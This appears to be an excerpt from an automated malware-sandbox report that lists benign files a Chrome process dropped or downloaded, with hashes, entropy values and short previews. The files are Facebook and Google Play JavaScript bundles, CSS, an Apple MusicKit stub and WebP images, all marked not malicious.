                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/. */.__d("blakejs-1.1.0",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a="Input must be an string, Buffer or Uint8Array";function b(b){var c;if(b instanceof Uint8Array)c=b;else if(b instanceof Buffer)c=new Uint8Array(b);else if(typeof b==="string")c=new Uint8Array(Buffer.from(b,"utf8"));else throw new Error(a);return c}function c(a){return Array.prototype.map.call(a,function(a){return(a<16?"0":"")+a.toString(16)}).join("")}function d(a){return(4294967296+a).toString(16).substring(1)}function e(a,b,c){var e="\n"+a+" = ";for(var f=0;f<b.length;f+=2){if(c===32)e+=d(b[f]).toUpperCase(),e+=" ",e+=d(b[f+1]).toUpperCase();else if(c===64)e+=d(b[f+1]).toUpperCase(),e+=d(b[f]).toUpperCase();else throw new Error("Invalid size "+c);f%6===4?e+="\n"+new Array(a.length+4).join(" "):f<b.length-2&&(e+=" ")}}function f(a,b,c){var d=new Date().getTime(),e=new Uint8Array(b);for(var f=0;f<
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10666
                                                                                                                                                                                                                                  Entropy (8bit):7.978774786509374
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/UHhnCtDtC1zgBFiQhfUA6v5vHo6VJvU4OIDkIqVJb1R:/UHhCPociQhfUnv5vLVJzOIR41R
                                                                                                                                                                                                                                  MD5:47833F10AEBEC984180E3FD36F9D2FF3
                                                                                                                                                                                                                                  SHA1:A78C80897BD272BFF32A54F3D9119A1C52A80B75
                                                                                                                                                                                                                                  SHA-256:B3607479E9258DA8AA8C8943BD8B7D2F27863E1FC656D2421846DA58390523B5
                                                                                                                                                                                                                                  SHA-512:2767362EE4809CDC2B288536D36791EE01E5E7C4CAD9C529F4AAC2883644B4806FD02BF17494E81F651434D4477402F6CE34DB37B29CBAFC793E61DAC19E6DEB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.)..WEBPVP8L.)../?.....m.6P.+............3A....|6<....! k.0.$%...+...GF....$5...|.......b.I..~.|.;...rT..S.A.CU...V...f..)..|...V?.V.._H...a..V~./......1^.....U.".*G..m.._Z.G....z..i......w.....]SF..Q..<^.......X.wd$...4i..iK.pX..........s..^x...N.B...I...?...z.._q.......K2.......R.]...........uww.Z.ug.T..[..J..!$.Of.x.mmy.l...E..[.0.O..wq........affff.2..etm.n.c9.mI.K...qD|p.....q6...1$...X...C .......@....,P....t......:....Q..1..G........1..`.. .....H.....5.iA...?.._.8(..9...LkJ.........+...11AP.$....t@..61..}..@...Y.......@.$,...m..v`e.n.q...M..:/<*........3..@@J.A..c...7...@.X...{qf...4.`..mKh|hJ.....3.#gv_...:0....*T.S..PT......h...........+D#._</....>]u-];!"..d.N..\....5...[.'Q.H.g%}.r|(.Wn;./4..z.}.F......sSf....4)....*....l...-._.n...`..._@./h...il...L.H0..M.Ru.d.*z?.B...+Q..{..3@.M.Y...zr..........q9S7...A....}...2.....4.<.h.O.a...X....I......$.,.`...rq...D0.+?.{........M,R.4EL.O[.....4...G..NW..o..CY...\.f.R.K~.vu...,...q..+j
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11894
                                                                                                                                                                                                                                  Entropy (8bit):7.98342607811884
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dcYaJBNV6lne4iMA2YBrAvCIODgv9T1cGrK/Mb9O66bK+v/FiM:dVaWlwMAnqvCIODgnpUq9Ole+v/FT
                                                                                                                                                                                                                                  MD5:4D44567B356D4E4FAEBE3A88FDB84B84
                                                                                                                                                                                                                                  SHA1:EC4D3AEB588CC0BE162D790A0FC75B24096139E3
                                                                                                                                                                                                                                  SHA-256:98FAD711CCCE1DE287BB8A98006D5231F52AFA9921CC5D637C583B41E1B9ACEC
                                                                                                                                                                                                                                  SHA-512:60EBB4691889FE1C58202E698C8DCF1C39E7648F9F36601FA33AB370FE2A0CCC521B6C774E4F66CA9ADE361C81A7383F85D419986AF804390253D50C5F7679F1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFn...WEBPVP8 b........*..(.>a(.E$"....L@....8....w5.....a.<?.o.. .'./.~........>[.........%.3...Of_...{..........g.K.W......{......Y......./...?......w.{......./M........q>..g............._F...7...*^.......!|a......?....].........[..........g._..B...........~.........c..{..0.....'...~....g.O.............?.......././.o........].w./._....7..=.~....:.s...C..R...s.9_.}?..q930..!7....O...JD2.fp..372%.......r..kdq...1h.i...y./-`.H..*.L..u..umo.9.....#.KYh.6H!4{:.@.Q.g.Z.J7......8...C..$TP..G....I@.9}....b.....-o...W.Y..bZs...X...MQy8I..5.Z..?...Z.OvI..s....]..xL...z.UHL2.1..l.......g].=...Zw..i.K...=.|.Z\....P.st.S~....D.Q...O.qv....Y.b..4(............i.rRd..........:f.!I%R/C...n.DM.!.B_.D.T.*8%...+.t.....0.c...}.....;...&.....R...Z..,fqJ.i..6.LR..O.%....'`..c.......b./+|........q1<.=6.w.....e.v=...m.36..b.V...w....|.c...,........>..c...w.C...y.9&./."..\0=q^X?sN`#...X.........G.......>k.9........@.<.;.4.r$R.1[.&..~b.9..A....z.-...@..i...%.o.'`..f;..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):347368
                                                                                                                                                                                                                                  Entropy (8bit):7.998736090192847
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:SNdiQK5xfaW1mP/mNV0DgczZ8r4u2bmnHqQ20J77azWd7TUh6acObhZU6tl/n:S7f2oWEP/M0EoZ8cZzaucT0g6Dn
                                                                                                                                                                                                                                  MD5:1D1C8A8F43ADFA61DDA6784CEE72B7B5
                                                                                                                                                                                                                                  SHA1:5D6F3A99858C71765225887C8C987B9E7C8CD7F3
                                                                                                                                                                                                                                  SHA-256:4C93F943ABAC6A70089E5BFC24AA2F1D6BA28D998EADE4378653ABCA14B21975
                                                                                                                                                                                                                                  SHA-512:F48E72ED2A9F2B6E8D11BDB58EED6B302832F1C4F645683D54777D822EDE3D0BB23A60044BD0E3853443E6461FBFA6264D6BFACFE4CC844E29E2F0986B1715F5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.L..WEBPVP8X...........k..VP8L.L../..Z..@l.F..y7......3..BD.'....q......$.`l.....m....m..3...m....c{...e..........<..............ff.1.N....2U.)....t \HUkl......mf..I.f..;....=......?....q.a...>..\.].%.B.t~4...kiI.4.....m..Y.ZKI4..n.vw.h.%.B........n....)..E..d.@.^=.....=...=...?.UU.9..<.A...r.cl[..u......y.GK.t:'...X.H..o...y.j.J"i._>..Z.P4.M.0=.D)...o...E.G...D....z..Um.[;.!.0.|.c..L......K.E.s{.=.`B.".@....m...r..L.}...i...._.......Q.A.....l.].r'{.....U...1.j...t*ed?N.)..,..c1BFF7...3. ##.$2........[.?Mm..k.suw..v.....<...v.'N{uj..020.!..B.!_.....m.A?..3.....'.vz...~...Ux.<.x..R.V.......FI...h...BH...x....~._...^.?.8t;gW..)!.U..Z.z........{.i.V.j.U#.(.`k.VV..a...8.#..>O-.>fu....u...!.~.....]...Fo.5j.(.q..9.pS..6..ir..i,q....c..M.....y..4..%.K.s......zK...V.:u.t.2..!...S..PX.O...8.f..0q\.-8...h'...;0..7..G.G1...7B..wuP.V. s...5.)...8.N=.>^...X..8mc+......8t.... ..).U.+].U+.....k.....#..f..B.A....V..m.9.....G*.P>.K..=.3.D.S..u.....t"..\T.F..+.8..L
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (61139)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):194466
                                                                                                                                                                                                                                  Entropy (8bit):5.336992588836603
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:gcFoGok4WOTbDklxWB36TI6CY370xVwC2+XGew73rtBbDGI9lrWqFqzLD64NZgpk:cnUxe6JzkxW3rblKoer
                                                                                                                                                                                                                                  MD5:6D68A3BF7B28FEE7F86686BBEFD5A1A7
                                                                                                                                                                                                                                  SHA1:06343B5F2235C6AF82241D7BD52FA816AB5609BF
                                                                                                                                                                                                                                  SHA-256:BA4C9C8335FCFB302860B21655EA2EB26063A71C1153C216CFC328B55DD44471
                                                                                                                                                                                                                                  SHA-512:FA5738FC767CAB178B4A1F3BDE2617A8DF0C13C99A64EED49B4A3FE478955CC8D41FC092B7376FBED28DFF54E814215705475F52B4350A06E1C100633EFAE5EC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.css"
                                                                                                                                                                                                                                  Preview:._7w5n{-webkit-appearance:none;background:none;border:none;cursor:pointer;padding:0}.._70au{background-color:#000;display:inline-block}._70aw{background:rgba(0, 0, 0, .5)}._70a-{align-items:flex-start;display:flex;flex-flow:row nowrap}._70av{background:#fff;border:solid 2px #c6c9cc;border-spacing:0;display:block;height:60px;position:relative;width:114px}._70as._70ao{height:78px;width:78px}._70a_{display:flex;flex-direction:row;width:100%}._70ax{cursor:pointer;display:inline-block;height:fit-content;max-height:max-content;max-width:max-content;width:fit-content}._70as{background-color:#e9eaeb;border:1px solid #dadcde;color:#212a34;cursor:pointer;height:80px;width:153px}._70ai{bottom:8px;position:absolute;right:8px}._70ay{display:block}._70as._1tp7:not(:focus){background:#E9EAEB url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px top 8px}._70at{border:1px solid #fa3e3e}._70az{background-color:#f5f7f8}.x1-5 ._70as._1tp7:not(:focus),.x2 ._70as._1tp7:not(:focus){background-image:url(
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1596
                                                                                                                                                                                                                                  Entropy (8bit):5.54367268319744
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:k9jR+heW7MxPsSz8hhRjsS1NoVoc9r6RzBwq2w8rl:k9jRkxNoVocg9Bgwol
                                                                                                                                                                                                                                  MD5:BF4368737D0A1EE89BCF5ECFEB0E8568
                                                                                                                                                                                                                                  SHA1:1662F7C7ABD8AAA4CC660DBFC30697F66ABD0828
                                                                                                                                                                                                                                  SHA-256:528C9C16DDA4BC3ACE45A38B6CCB654B90E69D440D5DF8DAA69894DF4C8DA65C
                                                                                                                                                                                                                                  SHA-512:19852EA664FF3B0C18AACF4AB93C69E937B952F85BE212C2ED1A4368638B9AFD0F6352DD83429248CD689007EBB700215D5AD0FC4FF92FAF2E45F39D75DE2A63
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=CKm2Wb"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.hTc=function(a,b){var c=a.qa,d="";a=a.du.Sd();const e=a.length;for(let t=0;t<e;t++){var f=_.P;var g=b;var h=a[t],k="";var m=h;var n="";switch(m.getItem().uc().Fa().H()){case 7:n+=""+m.getItem().Gb().Ga().H();break;case 10:n+=""+m.getItem().Ye().Ga().H();break;case 9:n+=""+_.ou(m.getItem()).Ga().H();break;case 1:n+=""+_.vy(m.getItem()).Ga().H()}m=n;n=h;var q="";switch(n.getItem().uc().Fa().H()){case 7:q+=_.Yo(_.zW(n.getItem().Gb().Pa().H()?.getUrl()));break;case 10:q+=_.Yo(_.zW(n.getItem().Ye().Pa().H()?.getUrl()));.break;case 9:q+=_.Yo(_.zW(_.ou(n.getItem()).Pa().H()?.getUrl()));break;case 1:q+=_.Yo(_.zW(_.vy(n.getItem()).Pa().H()?.getUrl()))}n=(0,_.Io)(q);q=(0,_.Io)(""+n);n="";switch(h.getItem().uc().Fa().H()){case 10:n+="BOOK";break;case 9:n+="BOOK";break;default:n+="APP"}h=h?.qc().jc();const v=n;n='<div class="'+_.T("Vde4Yb")+'">';q=(v==="BOOK"?(0,_.P)(_.jX(g,128,182,q,void 0,"ZPu
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (31220)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):50088
                                                                                                                                                                                                                                  Entropy (8bit):5.4168756881776705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:QT3Cl3UR5FlxRBsVZI2r4vlroHKay9/KUbBfNfGg2TnDdQs5CNthxTB3eARGTB:CBbFlxRurPAYfWs5sB3m
                                                                                                                                                                                                                                  MD5:9923E44E3A1C3B76ACAFF0880CC06AB7
                                                                                                                                                                                                                                  SHA1:75FD70940452C4804CA6C6DF2A7BEF31ADC2BF82
                                                                                                                                                                                                                                  SHA-256:8726494E52BF0A93133D578698DEADE14D856A1836D8DF00CFC975E5FE1307E4
                                                                                                                                                                                                                                  SHA-512:A7F7EC56F98B3F77C9BAB8C44BC405D280A295AAEC10688534815B1FB9B49A68453B2039CA622D033E9C868E97FE9927EF5EC2C52F82C50AD74EBAB7F26468B6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger")("async_dom").warn("Could not find relativeTo element for %s AsyncDOM operation based on selector: %s",f,g);switch(f){case"hide":b("CSS").hide(h);break;case"show":b("CSS").show(h);break;case"setContent":b("DOM").setContent(h,e);break;case"appendContent":b("DOM").appendContent(h,e);break;case"prependContent":b("DOM").prependContent(h,e);break;case"insertAfter":b("DOM").insertAfter(h,e);break;case"insertBefore":b("DOM").insertBefore(h,e);break;case"remove":b("DOM").remove(h);break;case"replace":b("DOM").replace(h,e);break;default:b("FBLogger")("async_dom").warn("Received invalid command %s for AsyncDOM operation",f)}}}};e.exports=a}),null);.__d("AsyncResponse",["invariant","Bootloader","FBLogger","HTML","WebDriverConfig"],(function(a,b
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6316)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):89262
                                                                                                                                                                                                                                  Entropy (8bit):5.433844673295272
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:EKzHfiewWzy+0OqtgKHQilCryLQa+gRd9NjppfpVDl6LvuAsu1UavNult+TFYTJT:EuH3zm3HZYyMaLRBcBvst+TFYTJT
                                                                                                                                                                                                                                  MD5:E8D3A6185D998234F144081623E5B457
                                                                                                                                                                                                                                  SHA1:27121EFCD7BC165C1EF9948E7FD7D265F09CBC53
                                                                                                                                                                                                                                  SHA-256:CA6A438B9F61C9A965A1586A4D5750E3366861A20B74C2FF01D1B44CCE47B701
                                                                                                                                                                                                                                  SHA-512:5CDAEBEAF6E79743518E54692CA70E4E0AABCFDBF8CF4A565611292072FCDE763F06287D18268B9C58E0BE32CC8D4A2157DD3C8E95D48D589BE9D7BE91683553
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractSidebarDefaultRouterLink.react",["GeoDomID","Link.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){var b=a.children,e=a["aria-describedby"],f=a["aria-labelledby"];a=babelHelpers.objectWithoutPropertiesLoose(a,["children","aria-describedby","aria-labelledby"]);f=d("GeoDomID").useApplyGeoDomIDsDirectly({"aria-describedby":(e=e)!=null?e:void 0,"aria-labelledby":(e=f)!=null?e:void 0});e=f.ref;f=babelHelpers.objectWithoutPropertiesLoose(f,["ref"]);return i.jsx(c("Link.react"),babelHelpers["extends"]({linkRef:e},a,f,{children:b}))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("AbstractSidebarRouterLinkContext",["AbstractSidebarDefaultRouterLink.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(c("AbstractSidebarDefaultRouterLink.react"));g["default"]=b}),98);.__d("AbstractSidebarLink.react",["cx","AbstractSidebarRouterLinkContext","GeoDomID","joinClasses","
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10406
                                                                                                                                                                                                                                  Entropy (8bit):7.976947502051991
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xWfmz3LYMhGnAgAZrZHHxSpDpEjCNwDS4vNJEr6B5lKNi6QiYfr:x/3LYL4ZrVHMEjCWx6lYfr
                                                                                                                                                                                                                                  MD5:7EA8EEF4C592A357819B5FFA1E58B1D3
                                                                                                                                                                                                                                  SHA1:7FCED200CBC0EB6FECED97F5610E9F1734BD02D8
                                                                                                                                                                                                                                  SHA-256:890964B52475866094DA17772EE73C74D0A9A1D0F8631183CBF8A0C885CDBF3A
                                                                                                                                                                                                                                  SHA-512:42EB59F28475ABCC111F109AF57BEFB0951D31AFC7DE8FF6685585B43151AB4E014DDDAA85C48C728F894C749D318901ED9DE7445B4835CC408519E3D227B099
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/49/c9/10/49c9108b-bdfc-c8e2-7693-47fd03b1c5b7/6d1c1189-0f7a-47e6-8e58-5463935e3fdc_5_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                  Preview:RIFF.(..WEBPVP8X..............VP8 .(.......*....>.J.I#.!....<.............y_./mk....^.<H..9Nz.......o.?s....?W?az........c.U.a......... .........A......................`.....!.p.U.....x........e...R.g........5.[.?.Z..'....m...G..m.....?.>._..........7.?.~.|..E...;...g.w...=.}i......./^.e.......i...[..77.no...I...s}&...EO9....`.?A...Ja.`?[5...4s........{....6C...Q5.l!..~.`..R}..k9.G.}g.X...mZ=..G..l.. ..k..*...X..Rj.=....b.m..}.qtx.9...}...sZ,...#.=.i..N.J....C#....%.<oO...f.`*...LF.y:.....a...:+...P#.L.f..Mhz..<...X=..`.....w....@O.jC.. ...e...I7Sc_.t...Eo....%..G.{W..f[.........>.......y..[8V~.._..E.....XN6...'."...V.m...._6......J;..`....a{....LH6l.(Q.$7.c.~9...Y...M.a.......1..p.a....M....$$..>2.1...eT....g.zp..2..G..3fP..eD.!io..$.b..X....c..de."..gb..la.l.............K....P.f...(.1..#...,.c.D.D..I|..W...T...I..gHp.#c#.k.A..(<..,4-Z..(T...*....a~..,..B.i.7..A.....)o.[....ek...%..n^M.$f.4..i.x..R..Mws.5.....V.._..Q(..=H8.......5..?..."s0y......+o..*.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17135)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):59956
                                                                                                                                                                                                                                  Entropy (8bit):5.264511741037863
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:n9txPZhgztxqYWkfk2iXUymBqBVvjogt4+wXZs8n1i+wcHuZRsF7d6BOLQuR4gI7:Hhwt2woZmo
                                                                                                                                                                                                                                  MD5:FC79B275417070FC0052283D97BB5B31
                                                                                                                                                                                                                                  SHA1:0E53644F25080A5E627B6EBA7CD265DE4AD4C7D2
                                                                                                                                                                                                                                  SHA-256:F66EF0A2BC1E35C7FDBC6DD68862D6FC17AB43956C7C6FE1BC39AD9892D7A168
                                                                                                                                                                                                                                  SHA-512:2212C600F5EBBCAFAFDEA64C6DB899716A09578C7F718FBF43D82DDDD5DFA8D10AA37AE8DFB9868CBBF563F278E88C1180A0D6D4CD8E3F82B64F25D8EC2EB7E1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/9NORmZkKZyv.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-shift");function a(){if(!g)return null;var a=0,b=0,c=[],d=new window.PerformanceObserver(function(d){for(var d=d.getEntries(),e=Array.isArray(d),f=0,d=e?d:d[typeof Symbol==="function"?Symbol.iterator:"@@iterator"]();;){var g;if(e){if(f>=d.length)break;g=d[f++]}else{f=d.next();if(f.done)break;g=f.value}g=g;if(!g.hadRecentInput){var h=c[0],i=c[c.length-1];b&&g.startTime-i.startTime<1e3&&g.startTime-h.startTime<5e3?(b+=g.value,c.push(g)):(b=g.value,c=[g]);b>a&&(a=b)}}});d.observe({buffered:!0,type:"layout-shift"});return function(){d.disconnect();return a}}f.getCLSCallback=a}),66);.__d("getReactComponentDisplayName",[],(function(a,b,c,d,e,f){"use strict";function a(a){var b=a.displayName;if(b!=null)return b;return a.name!=null?a.name:"Rea
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):625
                                                                                                                                                                                                                                  Entropy (8bit):4.952963038414406
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvYodXotHNu:u6oTTlrIYevhTuKtLG0MAodXcNu
                                                                                                                                                                                                                                  MD5:2DFF575911FD65E601AC64F87F07D5D1
                                                                                                                                                                                                                                  SHA1:AE28A08E8E333C9234AD0D024D0865E5E36C5B2C
                                                                                                                                                                                                                                  SHA-256:7DF89772DEFA309D97987A7D985ED3F0DA91D81180FE69BB11DA8A8B181B418D
                                                                                                                                                                                                                                  SHA-512:3E6530272A6497738135CE998D2221588C487A27F20BD3745224F3FA43FDBFF8A2C8DDD42709B01B1CBF8FCE8EB6DC1EC9FADFE5FCF1AAEF0DE5B18CAAA6CBD7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-42d04e97.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const n=function(){window.MusicKitComponents={version:"2350.1.0"}};export{n as g}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):37912
                                                                                                                                                                                                                                  Entropy (8bit):7.994395927835498
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:nZmTYtorWZ8SfDb1frUxnADCh54zfaQ/EoxCjZoyZLdVph5oj/:nZSYtycDZonhh54zfaVjRZ5VD27
                                                                                                                                                                                                                                  MD5:9412333F64366A0DE0D4627CA7621438
                                                                                                                                                                                                                                  SHA1:C0B9A4AA7A050CDD7CD6D1677050650CB2848584
                                                                                                                                                                                                                                  SHA-256:4B31A4DF1829C4B2C7B545AFEA87A84FFBBAFA01DB8A9F404E5BEA8E7344E2EA
                                                                                                                                                                                                                                  SHA-512:2EA6C5566DEB497423D2BEDC517EB8A455979C1E82FB9285A70EA97F51C673C646E8D95CF8C762B732C1E8952D66B5004FC51F2CBB1B55CE49E34F7EDDEF876B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/gUNwuhSI8pm3Bx_rl10RAROBMUVhixQ8Ci4_omoM4ttlN007sZ3ILduAZFboEu8Kzkg=w526-h296-rw
